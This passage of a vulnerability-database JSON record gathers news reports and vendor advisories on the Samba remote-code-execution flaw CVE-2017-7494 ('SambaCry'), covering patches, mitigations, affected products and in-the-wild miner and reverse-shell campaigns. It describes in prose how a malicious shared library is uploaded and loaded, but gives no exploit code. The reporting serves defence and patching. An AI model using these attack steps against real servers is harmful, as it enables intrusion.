victims.\"\n\nHowever, it is not clear what the attackers do with the compromised devices and what's their actual motive behind compromising the devices. \n \nThe [SambaCry vulnerability](<https://thehackernews.com/2017/05/samba-rce-exploit.html>) is hell easy to exploit and could be used by remote attackers to upload a shared library to a writable share and then cause the server to load and execute the malicious code. \n \nThe maintainers of Samba already [patched](<https://www.samba.org/samba/security/CVE-2017-7494.html>) the issue in Samba versions 4.6.4/4.5.10/4.4.14, so you are advised to patch your systems against the vulnerability as soon as possible. \n \nJust make sure that your system is running updated Samba version. \n \nAlso, attackers need to have writable access to a shared location on the target system to deliver the payload, which is another mitigating factor that might lower the rate of infection.\n", "modified": "2017-07-19T08:23:32", "published": "2017-07-18T21:23:00", "id": "THN:9DF1743B35B2E69D4835136091D08EAD", "href": "https://thehackernews.com/2017/07/linux-malware-sambacry.html", "type": "thn", "title": "New Linux Malware Exploits SambaCry Flaw to Silently Backdoor NAS Devices", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "Samba is the standard Windows interoperability suite of programs for Linux and Unix. ", "modified": "2017-05-27T02:53:53", "published": "2017-05-27T02:53:53", "id": "FEDORA:219F3605E539", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: samba-4.4.14-0.fc24", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "Samba is the standard Windows interoperability suite of programs for Linux and Unix. ", "modified": "2017-05-27T03:06:08", "published": "2017-05-27T03:06:08", "id": "FEDORA:0B8006061CC2", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: samba-4.5.10-0.fc25", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "Samba is the standard Windows interoperability suite of programs for Linux and Unix. ", "modified": "2017-06-03T17:39:59", "published": "2017-06-03T17:39:59", "id": "FEDORA:BC7B0601FC16", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: samba-4.6.4-0.fc26", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:38", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "description": "A patch for a critical vulnerability impacting the free networking software Samba was issued Wednesday. The flaw poses a severe threat to users, with approximately 104,000 Samba installations vulnerable to remote takeover. More troubling, experts say, the vulnerability can be exploited with just one line of code.\n\nSamba is a popular standard for providing Windows-based file and print services. It allows for interoperability between Unix and Linux systems and Microsoft Windows. With it, Linux, Mac and FreeBSD users can set up and share folders on Windows computers using the server message block (SMB) protocol. The vulnerability ([CVE-2017-7494](<https://www.samba.org/samba/security/CVE-2017-7494.html>)) affects versions 3.5 (released March 1, 2010) and onwards of Samba.\n\n\u201cWhile the WannaCry ransomworm impacted Windows systems and was easily identifiable, with clear remediation steps, the Samba vulnerability will impact Linux and Unix systems and could present significant technical obstacles to obtaining or deploying appropriate remediations,\u201d [wrote Rapid7 in a security bulletin](<https://community.rapid7.com/community/infosec/blog/2017/05/25/patching-cve-2017-7494-in-samba-it-s-the-circle-of-life>).\n\nComparisons are being made between the [WannaCry ransomware attacks ](<https://threatpost.com/next-nsa-exploit-payload-could-be-much-worse-than-wannacry/125743/>)and the Samba vulnerability because like WannaCry, the Samba vulnerability could be a conduit for a \u201cwormable\u201d exploit that spreads quickly. Also, any exploit taking advantage of the Samba vulnerability would also take advantage of bugs in the same SMB protocol used by the NSA exploits used to spread WannaCry.\n\n\u201cIt\u2019s trivial to trigger the vulnerability (just a one-line exploit). An attacker has to find an open SMB share (TCP/445), upload a shared library to the writable share, and then cause the server to load and execute it,\u201d [warned security researcher Xavier Mertens](<https://isc.sans.edu/forums/diary/Critical+Vulnerability+in+Samba+from+350+onwards/22452/>), with the SANS Internet Storm Center.\n\nAs of this morning, Rapid7 said there does not appear to be any signs the vulnerability is being exploited in the wild. However, researchers said that proof-of-concept exploit code is publicly available.\n\n\u201cWe believe these vulnerable systems are likely conduits into organization networks; but it\u2019s also likely that many of these devices are personal, IoT devices. Many home and corporate network storage systems run Samba and it\u2019s very straightforward to enable the Samba service on any Linux endpoint,\u201d said Bob Rudis, lead data scientist with Rapid7.\n\nOn Wednesday, [The Samba Team](<https://www.samba.org/samba/security/CVE-2017-7494.html>), a group of approximately 40 developers, released security updates that address a vulnerability in all versions of Samba from 3.5.0 onward. Additionally, there is a mitigation available within the configuration of Samba itself.\n\n\u201cAdding the argument \u201cnt pipe support = no\u201d to the global section of the smb.conf file and restarting the service will also mitigate the threat,\u201d wrote Cisco [in a bulletin posted Thursday](<https://blogs.cisco.com/security/talos/samba-vuln-details>).\n\nAccording to Samba Team, the vulnerability was found by a researcher identified as \u201csteelo\u201d and patch was developed by Volker Lendecke of SerNet and the Samba Team.\n", "modified": "2017-06-02T00:00:01", "published": "2017-05-25T12:20:32", "id": "THREATPOST:6B393C6EA80E795EF303485AFABE5327", "href": "https://threatpost.com/samba-patches-wormable-bug-exploitable-with-one-line-of-code/125915/", "type": "threatpost", "title": "Samba Patches Critical Bug Exploitable With One Line Of Code", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:34", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "description": "Unknown attackers are using a recently patched [vulnerability in Samba](<https://threatpost.com/samba-patches-wormable-bug-exploitable-with-one-line-of-code/125915/>) to spread a resource-intensive cryptocurrency mining utility. To date, the operation has netted the attackers just under $6,000 USD, but the number of compromised computers is growing, meaning that a significant number of Samba deployments on *NIX servers remain unpatched.\n\nThe attack also demonstrates that the vulnerability in Samba, [CVE-2017-7494,](<https://access.redhat.com/security/cve/cve-2017-7494>) can extend EternalBlue-like attacks into Linux and UNIX environments. Samba is a software package that runs on Linux and UNIX servers and sets up file and print services over the SMB networking protocol, integrating those services into a Windows environment.\n\nThe [Samba vulnerability](<https://threatpost.com/samba-patches-wormable-bug-exploitable-with-one-line-of-code/125915/>) is similar to the SMB bug exploited on May 12 by attackers using the NSA\u2019s EternalBlue exploit to spread [WannaCry ransomware](<https://threatpost.com/leaked-nsa-exploit-spreading-ransomware-worldwide/125654/>). Experts warned that EternalBlue can be fitted with any measure of attack, and they have a similar message about this flaw, which has been nicknamed SambaCry.\n\nResearchers at Kaspersky Lab said that one of their honeypots snagged on May 30 some of the first exploits targeting the Samba vulnerability. The payload was a two-headed threat: a Linux backdoor and a mining utility called Cpuminer that is leveraging the processing power of its victims to create Monero cryptocurrency.\n\n\u201cThe attacked machine turns into a workhorse on a large farm, mining crypto-currency for the attackers,\u201d Kaspersky Lab said in a [report](<https://securelist.com/sambacry-is-coming/78674/>) published on Securelist.com.\n\nThe researchers said the attackers\u2019 Monero wallet and pool address are hardcoded in the attack.\n\n\u201cAccording to the log of the transactions, the attackers received their first crypto-coins on the very next day, on April 30th,\u201d Kaspersky Lab said. \u201cDuring the first day they gained about 1 XMR (about $55 according to the currency exchange rate for 08.06.2017), but during the last week they gained about 5 XMR per day. This means that the botnet of devices working for the profit of the attackers is growing.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/06/06224309/sambacry_05.png>)\n\nAs of Friday, the attackers had mined about $6,000 USD, and Kaspersky Lab said it was unsure about the scale of the attack. Upon disclosure of the Samba vulnerability almost three weeks ago, Rapid7 said an internet scan using its ProjectSonar software found more than 104,000 endpoints running vulnerable versions of Samba over port 445, the SMB port. More than 92,000 are running versions of Samba that have no patches available. The vulnerability was introduced into Samba in 2010 in version 3.5.0; admins should upgrade to patched versions: 4.6.4, 4.5.10 and 4.4.14.\n\nKaspersky Lab said the exploit is assembled as a Samba plugin, below. After running a check\u2014a file containing random symbols\u2014to see whether the server has write permissions for the network, the attack must then brute-force the full path to dropped file. The most obvious paths are laid out in Samba instruction manuals, Kaspersky Lab said. Once it finds the path, the exploit is loaded and executed in the context of the Samba server process using the vulnerability; it runs only in virtual memory.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/06/06224314/sambacry_02.png>)\n\nKaspersky Lab said the attacks captured by its honeypot contained two files, a Linux backdoor and the miner. INAebsGB.so and cblRWuoCc.so respectively. INAebsGB.so is a reverse shell that connects to the port of the IP address specified by the owner giving it remote access to the shell.\n\n\u201cAs a result, the attackers have an ability to execute remotely any shell-commands. They can literally do anything they want, from downloading and running any programs from the Internet, to deleting all the data from the victim\u2019s computer,\u201d Kaspersky Lab said, adding that this is similar to the SambaCry exploit in Metasploit.\n\nThe other file, cblRWuoCc.so, downloads and executes Cpuminer from a domain registered on April 29.\n\nCoincidentally, another set of attackers used EternalBlue to spread a cryptocurrency miner called [Adylkuzz](<https://threatpost.com/wannacry-shares-code-with-lazarus-apt-samples/125718/>) for Monero on Windows machines. Monero is marketed as a privacy conscious cryptocurrency, and goes to great lengths to obfuscate its blockchain making it a challenge to trace any activity.\n\nThe Adylkuzz attacks pre-date WannaCry with the first samples going back to April 24, researchers at Proofpoint said. More than 20 virtual private servers were scanning the internet for targets running port 445 exposed, the same port used by SMB traffic when connected to the internet, and the same port abused by EternalBlue and DoublePulsar.\n", "modified": "2017-06-12T13:34:17", "published": "2017-06-12T09:34:17", "id": "THREATPOST:5800C37DAB0716BD2D308FB187B6B7E1", "href": "https://threatpost.com/attackers-mining-cryptocurrency-using-exploits-for-samba-vulnerability/126191/", "type": "threatpost", "title": "Attackers Mining Cryptocurrency Using Exploits for Samba Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:36", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "description": "Device manufacturers are combing through code again this week to determine whether their products are affected by a vulnerability tied to the SMB file-sharing protocol.\n\nThe vulnerability, (CVE-2017-7494) [disclosed last Wednesday](<https://threatpost.com/samba-patches-wormable-bug-exploitable-with-one-line-of-code/125915/>), affects versions of 3.5.0 onward of Samba, the free software re-implementation of the SMB/CIFS networking protocol. If exploited, the bug could allow authenticated attackers to execute arbitrary code remotely and take control of an affected system.\n\n> Samba Releases Security Updates <https://t.co/BkdgitQrl8>\n> \n> \u2014 US-CERT (@USCERT_gov) [May 25, 2017](<https://twitter.com/USCERT_gov/status/867542749053976576>)\n\nSamba pushed a patch for versions 4.4 and higher [a week ago](<https://www.samba.org/samba/security/CVE-2017-7494.html>) but companies, many of which make products that use Samba, are continuing to learn about the vulnerability\u2019s scope.\n\n[Cisco confirmed Tuesday](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170530-samba>) that two of its products are affected by the bug and that it\u2019s investigating which of its other products might be affected. Netgear said last week it was also looking into its products and that it had already pushed firmware updates for some it found were affected by the vulnerability.\n\nSo far, Cisco says it\u2019s in the middle of developing fixes for two affected products, its Network Analysis Module and Video Surveillance Media Server. The company claims it\u2019s reviewing whether the following 11 additional products are affected:\n\n * Cisco Identity Services Engine (ISE)\n * Cisco Small Business RV Series RV320 Dual Gigabit WAN VPN Router\n * Cisco Common Services Platform Collector\n * Cisco IP Interoperability and Collaboration System (IPICS)\n * Cisco Expressway Series\n * Cisco MXE 3500 Series Media Experience Engines\n * Cisco TelePresence Video Communication Server (VCS)\n * Cisco VDS Recorder\n * Cisco VDS-TV Caching Nodes\n * Cisco VDS-TV Streamer\n * Cisco VDS-TV Vault\n\nConversely the company says three products, its Application and Content Networking System \u2013 ACNS, Web Security Appliance \u2013 WSA, and Digital Media Manager, are not vulnerable.\n\nNetgear was one of the first companies to push a fix for affected products out the gate. It released firmware fixes for its ReadyNAS products running OS 6.x last week. A Netgear forum moderator said Friday the company plans to move to a newer version of Samba on OS 6 in the future but in the meantime has backported Samba\u2019s fix.\n\nThe company also pushed [new versions of RAIDar](<https://community.netgear.com/t5/Using-your-ReadyNAS/Any-plans-for-Samba-fix-for-CVE-2017-7494/td-p/1290160>), the firmware ReadyNAS devices use, to mitigate the vulnerability on Tuesday. Users can download the [Legacy Sparc](<https://kb.netgear.com/000038792/RAIDiator-Version-4-1-16-Sparc>), [x86](<https://kb.netgear.com/000038793/RAIDiator-x86-Version-4-2-31>), and [ARM](<https://kb.netgear.com/000038794/RAIDiator-arm-Version-5-3-13-for-ReadyNAS-Duo-v2-NV-v2>) firmware for the network storage devices via the company\u2019s support page.\n\nThe company [says it is also investigating](<https://kb.netgear.com/000038779/Security-Advisory-for-CVE-2017-7494-Samba-Remote-Code-Execution>) whether ReadyNAS products running 4.1, 4.2, 5.x, and 6.x, its ReadyDATA products, and a handful of routers are vulnerable:\n\n * C7100V\n * C6220\n * C3700\n * N450/CG3000Dv2\n * R7000P\n * R6900P\n * C3000\n * C6250\n * C6300\n * C7000\n\nThe company is recommending users concerned about the vulnerability disable write access to drives shared via SMB or simply remove USB storage devices connected to their router or gateway.\n\n\u201cThe potential for remote code execution remains if you do not complete all recommended steps,\u201d Netgear warns in its advisory.\n\nSynology, another company that manufactures NAS devices, [released updates](<https://www.synology.com/en-global/support/security/Important_Information_Regarding_Samba_Vulnerability_CVE_2017_7494>) (6.1.1-4 and DSM 6.0.3-1) for two affected products \u2013 DiskStation Manager (DSM) 6.1 and DSM 6.0 \u2013 last week. The company, headquartered in Taipei, is reportedly working on a fix for another affected product, its web-based operating system Synology Router Manager (SRM) 1.1. That fix should arrive this week, Synology says.\n\nThe Samba vulnerability initially drew comparisons to [WannaCry](<https://threatpost.com/leaked-nsa-exploit-spreading-ransomware-worldwide/125654/>), the ransomware worm responsible for 200,000 infections across 150 countries earlier this month. Both vulnerabilities rely on leveraging a vulnerability in the SMB protocol. Samba is predominantly run on Linux and Unix machines however, making them the biggest target here.\n\nResearchers with Rapid7 [said last week](<https://community.rapid7.com/community/infosec/blog/2017/05/25/patching-cve-2017-7494-in-samba-it-s-the-circle-of-life>) that saw more than 104,000 internet-exposed endpoints running vulnerable versions of Samba on port 445 and approximately 110,000 endpoints on port 139. According to the company, 91 percent of the port 139 endpoints were running older, unsupported versions of Samba, something that could make resolving the vulnerability tricky.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/05/06224521/Screen-Shot-2017-05-31-at-12.34.32-PM.png>)\n\nSince Samba\u2019s patch is only for versions 4.4 and up, users running older versions, 3.5x to 4.4x, need to update to a supported version of the software in order to apply the patch.\n\nThe bug is seemingly the biggest to surface in Samba since last year\u2019s Badlock vulnerability. That bug, [hyped for weeks](<https://threatpost.com/badlock-vulnerability-clues-few-and-far-between/117008/>), [ultimately fell short of expectations](<https://threatpost.com/badlock-vulnerability-falls-flat-against-its-hype/117349/>). Instead of allowing code execution\u2014like last week\u2019s bug, Badlock was merely a combination man-in-the-middle and denial-of-service bug that allowed attackers to elevate privileges or crash a Windows machine running Samba.\n", "modified": "2017-06-05T15:19:35", "published": "2017-05-31T13:51:56", "id": "THREATPOST:B108BD1ECF3200F21B65BFC1C849F747", "href": "https://threatpost.com/cisco-netgear-readying-patches-for-samba-vulnerability/125974/", "type": "threatpost", "title": "Cisco, Netgear Readying Patches for Samba Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:34:02", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "USN-3296-1 fixed a vulnerability in Samba. This update provides the \ncorresponding update for Ubuntu 12.04 ESM.\n\nOriginal advisory details:\n\nIt was discovered that Samba incorrectly handled shared libraries. A remote \nattacker could use this flaw to upload a shared library to a writable share \nand execute arbitrary code.", "edition": 6, "modified": "2017-05-24T00:00:00", "published": "2017-05-24T00:00:00", "id": "USN-3296-2", "href": "https://ubuntu.com/security/notices/USN-3296-2", "title": "Samba vulnerability", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:41:07", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "It was discovered that Samba incorrectly handled shared libraries. A remote \nattacker could use this flaw to upload a shared library to a writable share \nand execute arbitrary code.", "edition": 5, "modified": "2017-05-24T00:00:00", "published": "2017-05-24T00:00:00", "id": "USN-3296-1", "href": "https://ubuntu.com/security/notices/USN-3296-1", "title": "Samba vulnerability", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:10", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information.\n\nSecurity Fix(es):\n\n* A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this issue. Upstream acknowledges steelo as the original reporter.", "modified": "2018-06-07T02:43:01", "published": "2017-05-24T11:27:07", "id": "RHSA-2017:1273", "href": "https://access.redhat.com/errata/RHSA-2017:1273", "type": "redhat", "title": "(RHSA-2017:1273) Important: samba security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:20", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information.\n\nSecurity Fix(es):\n\n* A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this issue. Upstream acknowledges steelo as the original reporter.", "modified": "2017-08-28T06:44:20", "published": "2017-06-05T09:47:14", "id": "RHSA-2017:1390", "href": "https://access.redhat.com/errata/RHSA-2017:1390", "type": "redhat", "title": "(RHSA-2017:1390) Important: samba security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:26", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nSecurity Fix(es):\n\n* A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this issue. Upstream acknowledges steelo as the original reporter.", "modified": "2018-06-07T18:22:55", "published": "2017-05-24T11:26:37", "id": "RHSA-2017:1271", "href": "https://access.redhat.com/errata/RHSA-2017:1271", "type": "redhat", "title": "(RHSA-2017:1271) Important: samba4 security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:33", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible machines\nto share files, printers, and other information.\n\nSecurity Fix(es):\n\n* A remote code execution flaw was found in Samba. A malicious authenticated\nsamba client, having write access to the samba share, could use this flaw to\nexecute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this issue. Upstream\nacknowledges steelo as the original reporter.\n", "modified": "2017-09-08T11:59:30", "published": "2017-05-24T04:00:00", "id": "RHSA-2017:1272", "href": "https://access.redhat.com/errata/RHSA-2017:1272", "type": "redhat", "title": "(RHSA-2017:1272) Important: samba3x security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2020-12-08T03:34:18", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "**CentOS Errata and Security Advisory** CESA-2017:1270\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information.\n\nSecurity Fix(es):\n\n* A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this issue. Upstream acknowledges steelo as the original reporter.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-May/034457.html\nhttp://lists.centos.org/pipermail/centos-announce/2017-May/034458.html\n\n**Affected packages:**\nctdb\nctdb-tests\nlibsmbclient\nlibsmbclient-devel\nlibwbclient\nlibwbclient-devel\nsamba\nsamba-client\nsamba-client-libs\nsamba-common\nsamba-common-libs\nsamba-common-tools\nsamba-dc\nsamba-dc-libs\nsamba-devel\nsamba-doc\nsamba-domainjoin-gui\nsamba-glusterfs\nsamba-krb5-printing\nsamba-libs\nsamba-pidl\nsamba-python\nsamba-swat\nsamba-test\nsamba-test-libs\nsamba-vfs-glusterfs\nsamba-winbind\nsamba-winbind-clients\nsamba-winbind-devel\nsamba-winbind-krb5-locator\nsamba-winbind-modules\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-1270.html", "edition": 4, "modified": "2017-05-25T14:37:25", "published": "2017-05-25T13:08:37", "href": "http://lists.centos.org/pipermail/centos-announce/2017-May/034457.html", "id": "CESA-2017:1270", "title": "ctdb, libsmbclient, libwbclient, samba security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-08T03:38:00", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "**CentOS Errata and Security Advisory** CESA-2017:1271\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information.\n\nSecurity Fix(es):\n\n* A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this issue. Upstream acknowledges steelo as the original reporter.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-May/034456.html\n\n**Affected packages:**\nsamba4\nsamba4-client\nsamba4-common\nsamba4-dc\nsamba4-dc-libs\nsamba4-devel\nsamba4-libs\nsamba4-pidl\nsamba4-python\nsamba4-test\nsamba4-winbind\nsamba4-winbind-clients\nsamba4-winbind-krb5-locator\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-1271.html", "edition": 4, "modified": "2017-05-25T13:07:15", "published": "2017-05-25T13:07:15", "href": "http://lists.centos.org/pipermail/centos-announce/2017-May/034456.html", "id": "CESA-2017:1271", "title": "samba4 security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2019-02-01T18:01:51", "bulletinFamily": "software", "cvelist": ["CVE-2017-7494"], "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "modified": "2017-11-29T00:00:00", "published": "2017-11-29T00:00:00", "id": "HUAWEI-SA-20171129-01-SAMBA", "href": "https://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20171129-01-samba-en", "title": "Security Advisory - Samba Remote Code Execution Vulnerability in Some Huawei Products", "type": "huawei", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-29T13:11:52", "bulletinFamily": "software", "cvelist": ["CVE-2017-7494"], "description": "All versions of Samba from 3.5.0 onwards are vulnerable to a remote code execution vulnerability, allowing an authenticated attacker to upload a shared library to a writable share and execute arbitrary code remotely on a targeted system. Samba 4.6.4, 4.5.10 and 4.4.14 have been issued as security releases to correct the defect. (Vulnerability ID: HWPSIRT-2017-05176)\nThis vulnerability has been assigned a CVE ID: CVE-2017-7494.\nHuawei has released software updates to fix this vulnerability. This advisory is available at the following link:\nhttp://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170613-01-samba-en", "edition": 1, "modified": "2017-11-29T00:00:00", "published": "2017-06-13T00:00:00", "href": "http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170613-01-samba-en", "id": "HUAWEI-SA-20170613-01-SAMBA", "type": "huawei", "title": "Security Advisory - Samba Remote Code Execution Vulnerability in Some Huawei Products", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2017-05-25T17:47:35", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "This update for samba fixes the following issue:\n\n - An unprivileged user with access to the samba server could cause smbd to\n load a specially crafted shared library, which then had the ability to\n execute arbitrary code on the server as 'root'. [CVE-2017-7494,\n bso#12780, bsc#1038231]\n\n", "edition": 1, "modified": "2017-05-24T15:10:25", "published": "2017-05-24T15:10:25", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00065.html", "id": "SUSE-SU-2017:1393-1", "title": "Security update for samba (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-05-25T17:47:36", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "This update for samba fixes the following issue:\n\n - An unprivileged user with access to the samba server could cause smbd to\n load a specially crafted shared library, which then had the ability to\n execute arbitrary code on the server as 'root'. [CVE-2017-7494,\n bso#12780, bsc#1038231]\n\n", "edition": 1, "modified": "2017-05-24T15:09:27", "published": "2017-05-24T15:09:27", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00064.html", "id": "SUSE-SU-2017:1391-1", "title": "Security update for samba (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-05-26T17:45:59", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "This update for samba fixes the following issue:\n\n - An unprivileged user with access to the samba server could cause smbd to\n load a specially crafted shared library, which then had the ability to\n execute arbitrary code on the server as 'root'. [CVE-2017-7494,\n bso#12780, bsc#1038231]\n\n This update was imported from SUSE:SLE-12-SP1:Update project.\n\n NOTE: This update is released in openSUSE Leap 42.1 after its official End\n Of Life only because\n of its severity and potential impact for users that have not migrated yet.\n\n Please upgrade your openSUSE Leap 42.1 as soon as possible.\n\n", "edition": 1, "modified": "2017-05-26T18:09:30", "published": "2017-05-26T18:09:30", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00072.html", "id": "OPENSUSE-SU-2017:1415-1", "title": "Security update for samba (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-05-25T17:47:35", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "This update for samba fixes the following issue:\n\n - An unprivileged user with access to the samba server could cause smbd to\n load a specially crafted shared library, which then had the ability to\n execute arbitrary code on the server as 'root'. [CVE-2017-7494,\n bso#12780, bsc#1038231]\n\n", "edition": 1, "modified": "2017-05-24T15:09:57", "published": "2017-05-24T15:09:57", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00066.html", "id": "SUSE-SU-2017:1392-1", "title": "Security update for samba (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-05-25T17:47:35", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "This update for samba fixes the following issue:\n\n - An unprivileged user with access to the samba server could cause smbd to\n load a specially crafted shared library, which then had the ability to\n execute arbitrary code on the server as 'root'. [CVE-2017-7494,\n bso#12780, bsc#1038231]\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n", "edition": 1, "modified": "2017-05-24T21:12:15", "published": "2017-05-24T21:12:15", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00069.html", "id": "OPENSUSE-SU-2017:1401-1", "title": "Security update for samba (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2021-01-17T13:49:48", "description": "Security Fix(es) :\n\n - A remote code execution flaw was found in Samba. A\n malicious authenticated samba client, having write\n access to the samba share, could use this flaw to\n execute arbitrary code as root. (CVE-2017-7494)", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-25T00:00:00", "title": "Scientific Linux Security Update : samba on SL6.x, SL7.x i386/x86_64 (20170524) (SambaCry)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-25T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:samba-client-libs", "p-cpe:/a:fermilab:scientific_linux:samba-domainjoin-gui", 